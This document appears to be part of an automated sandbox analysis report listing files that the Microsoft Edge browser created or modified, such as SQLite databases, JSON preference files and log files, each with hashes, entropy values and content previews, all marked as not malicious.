              SHA-512:904A94B36223287D06CA19F2393540FF322393EE8371524E4191858B24CE93DF18CFDC5EA456635ACEE9B6137F7BE78DA974FBB9002F07A883C4625B52152BB4
              Malicious:false
              Reputation:unknown
              Preview:........................................~z.i.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
              Category:modified
              Size (bytes):155648
              Entropy (8bit):0.5891933264994542
              Encrypted:false
              SSDEEP:
              MD5:948B8A3773BD49E7E191F05FF3203634
              SHA1:5EA2C29D9159CBC29DC2381AABFD2F76D167D723
              SHA-256:870E78C18E0961EFF9B586EA4635B37C2C8E8E9C093735FB811AA00C481993F6
              SHA-512:0CFCF1DB089025FF8478544F56E8C662DFA0067A6B6C69081866D9AB42BB0B72F57F4360DA4BC553480D45EE3E91DF80F673BAF734FDDD5B93526ECB7FFE7248
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:3D8183370B5E2A9D11D43EBEF474B305
              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
              Malicious:false
              Reputation:unknown
              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
              Category:dropped
              Size (bytes):45056
              Entropy (8bit):3.9187974438815223
              Encrypted:false
              SSDEEP:
              MD5:4BBC42706DC4354C7CF3AFF84A432E2E
              SHA1:38780352A62B8DCC78D892910F4D7047E5CA1D79
              SHA-256:276CEC55B1EE6324EC6AFC9647DD9BCD771A23DC249617FD40423A4430AF2107
              SHA-512:AF98E5D0022C19876CE459948DB1DCF5B9070D1BD683845B1524ABECB61A2D4DD87EDBB8419805F4440DC04AF4C4C9B330105C368AC02C6FB794EEA5E2A4159D
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.300438300046746
              Encrypted:false
              SSDEEP:
              MD5:30EE22F1A53B2AFCDC7160CFEAE6A4CC
              SHA1:E399D768DD8560F4A78CA1AA12C0A96E74DD6217
              SHA-256:3CA2B82BD1BB709FB1325D1464B48DC215A384724DCDBD2DF49C8FC65B63065B
              SHA-512:D08916DF044A0BFB65334F68CB660A695A4A2A8A6AB24D0802C0CE82940F6AAC632E495F048F2F1AB55E6E225CD09A8A4F246435DB38BDD0CF5DF24B75646672
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:30.037 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/02/29-11:57:30.038 1578 Recovering log #3.2024/02/29-11:57:30.038 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):931
              Entropy (8bit):5.3926270303513375
              Encrypted:false
              SSDEEP:
              MD5:61E7E4288FDFE6DB6EB479CCBD74EA5A
              SHA1:D425B5C42730815A94EAAA275A5B8BB6954DA6FD
              SHA-256:1955B7AF8C32402D915C29D25CCFF219C704768BA06AE29C85F8DEF21D6E7A50
              SHA-512:F0751C19E9455AB7B4D739BF8B9F33B18FA18BE55257E1CF6629A7B9F1916D9671FC9232206EBAEA125ACC770833CB0F8BC38C0096CBA1E444FFD7CA6AFDB101
              Malicious:false
              Reputation:unknown
              Preview::..>(................VERSION.1./META:https://microsoftedgewelcome.microsoft.com............4_https://microsoftedgewelcome.microsoft.com.._uetsid!.5ba10370d6f111ee8a3eaffff2979c1a.8_https://microsoftedgewelcome.microsoft.com.._uetsid_exp..Fri, 01 Mar 2024 10:57:40 GMT.4_https://microsoftedgewelcome.microsoft.com.._uetvid!.5ba11ec0d6f111ee8970a1295811dcae.8_https://microsoftedgewelcome.microsoft.com.._uetvid_exp..Tue, 25 Mar 2025 10:57:40 GMT.o_https://microsoftedgewelcome.microsoft.com..Thu Feb 29 2024 11:57:41 GMT+0100 (Central European Standard Time)~...m.............../META:https://microsoftedgewelcome.microsoft.com...........8_https://microsoftedgewelcome.microsoft.com.._uetsid_exp..Fri, 01 Mar 2024 10:57:46 GMT.8_https://microsoftedgewelcome.microsoft.com.._uetvid_exp..Tue, 25 Mar 2025 10:57:46 GMT.o_https://microsoftedgewelcome.microsoft.com..Thu Feb 29 2024 11:57:46 GMT+0100 (Central European Standard Time)
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):336
              Entropy (8bit):5.120269028904374
              Encrypted:false
              SSDEEP:
              MD5:6F2D80F5DB7971F701D853E86968F3EC
              SHA1:EEDF3020F54EB88FFFAE0FF5674907F4546D26E4
              SHA-256:C9F42D73B1F0709A81C90B0D8ED41EBBB6526E1D5D3C8D73506A766988837F23
              SHA-512:28F16164109D80479180DE4F840F52283800ABB95B2F6D7CC781E6E2D5656AC02B24BFB170DC0364578CFC8660B09AD5B7FE839F3074117388FCBFF0D9B0A179
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.192 1be0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/02/29-11:57:29.218 1be0 Recovering log #3.2024/02/29-11:57:29.229 1be0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 4
              Category:dropped
              Size (bytes):45056
              Entropy (8bit):0.6144301399145172
              Encrypted:false
              SSDEEP:
              MD5:1BCC6EE60EAF504E23113640020DC52B
              SHA1:0E021C0C26166EACC3F20D60240CE63FE56D5251
              SHA-256:F323F01B3F2728D768BB913A4A86AFEC282447EDACA83DB32514414045C4155E
              SHA-512:A7B24A96FB820A9AF88FB16787D26EE8AEA5AD999508BDE4F6D4B64665B0EDEEE9E4165DF091B6163A2156710051228B137D5FF2D6C06AD8BB3E32C28BED48F4
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):111
              Entropy (8bit):4.718418993774295
              Encrypted:false
              SSDEEP:
              MD5:285252A2F6327D41EAB203DC2F402C67
              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
              Malicious:false
              Reputation:unknown
              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):649
              Entropy (8bit):5.3035288748421365
              Encrypted:false
              SSDEEP:
              MD5:890E445D5EE6B8679F3E4015972BDD3D
              SHA1:D0BBBB276322A39D7299254037626CF355994AF2
              SHA-256:1CA6C3653FF147B729451E6DFEDA53D415E9EC7665D0A84E91D6E86F34B80CBA
              SHA-512:0D539503347A334A702B004B620F575C97F5D0F85F610A28579E3E505D8811CEDF3029BBDEC3AB125DDC6BDC65EE7564186002C6A44843B6B3B4EEAB27CF750C
              Malicious:false
              Reputation:unknown
              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13356269850194440","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13356269850707868","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 10, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 10
              Category:modified
              Size (bytes):20480
              Entropy (8bit):2.3290769030658813
              Encrypted:false
              SSDEEP:
              MD5:732682F5C147EC6CD9AE8C605C49D0F7
              SHA1:839E0DE5AF5336522DE976A772846E253B3107E8
              SHA-256:33712247A9FD8303FB9B6D05251123534E6AA85DF44BDB6CAEEADB88C6F2D96F
              SHA-512:A2E207FFFDCD13CBCB9C7454064E8ECE734760A4DB0B73DA9ABA6F9448ABA307825078300B6A1C2A136B11C1268181442D6991C282A762EEB0E9B6ECD0FBB1AE
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:285252A2F6327D41EAB203DC2F402C67
              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
              Malicious:false
              Reputation:unknown
              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:285252A2F6327D41EAB203DC2F402C67
              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
              Malicious:false
              Reputation:unknown
              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
              Category:modified
              Size (bytes):36864
              Entropy (8bit):1.1131149608167856
              Encrypted:false
              SSDEEP:
              MD5:549F9D3FEE211E5A73DC5B438651EEDB
              SHA1:40EEBD29599B79EA8054C130D597A7BF78CC5ED5
              SHA-256:BF91901733F652D315E115F1DBE499A4C2600E906D966172FB2A3E08B5C6832E
              SHA-512:40FD88604FDA16ABF1801ABA740636C7AE58101503B1D044E91A589365612700A9AA16C1A423FFA45C970F2B82E8903043A387D84176BF40271189AE3B08DB6B
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.4716248163409303
              Encrypted:false
              SSDEEP:
              MD5:72E9D82D6C1742197EEA43EC203C6825
              SHA1:275AE552E437747FD707962111675AA2C8DEEB0F
              SHA-256:0DB0BA239E0421208146C4FBB809F2DBD960019FE4F4EC4CBC894C29627DD759
              SHA-512:C62C7C0C9BBE1CFAE2FEF39FBDF70BB5316713D87453096676BD854A19FDD8BC62F1608F8BE3602AD8770B94C13FFE5A9516F05A95548615CB78ED9CEADC7EA9
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j.......q..g...q.0....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.7895989195988252
              Encrypted:false
              SSDEEP:
              MD5:76330A7D1C579F03B582565E8E9E94B2
              SHA1:3B73EA29DBBF7A81497AEA73F7822529E7CAF770
              SHA-256:7A677EB8C4019A9EB24A0154DC1640D699C2548A8EF3A20C019C6C33AD202206
              SHA-512:55FD2160796761E96541C9108063EB84C561BD66A496E21FBFF574D80FFFC4302B055F57F69F41D6BAC482C0A8F607E0E3CEA25F92F961C2B6012B6EC744C056
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:F912C3FEBBD5536ECB9DFAA4AD08EC33
              SHA1:089D859952171A8A816D22AD24E8942E4B333723
              SHA-256:1D874B980A48EC1EB5E3248A8A51D8421285377B438349CF26C074CC19401E9F
              SHA-512:7D9E8BC6B9ABACBFDBA767AF053FDCEFF7E3DCC5A8B695C312DD3AD589186A96666F59A1A1453D2DC99358F100B99C193F6B96A09B7B7B34FB0D8B4C8D1248C7
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:C13C7A193D5296B6EBDD7CB5597B55CA
              SHA1:364636C6A462AC63B673000CA42B6FE97A468543
              SHA-256:A0F69086C1B5334A2C2F5F23CA3D1B6E01AB6781CAC89709361D20CA3207FDCC
              SHA-512:5754B0524F2274374496546132C81BC483A2E31F3616D0D4A2715B8E2BBB2387547FA7E84DB0FCF026E5C362A6590EFD4167FDC1AD99B6E193DD4CE4186CE8EF
              Malicious:false
              Reputation:unknown
              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13353677849058639","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13353677849058639","location":5,"ma
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:C13C7A193D5296B6EBDD7CB5597B55CA
              SHA1:364636C6A462AC63B673000CA42B6FE97A468543
              SHA-256:A0F69086C1B5334A2C2F5F23CA3D1B6E01AB6781CAC89709361D20CA3207FDCC
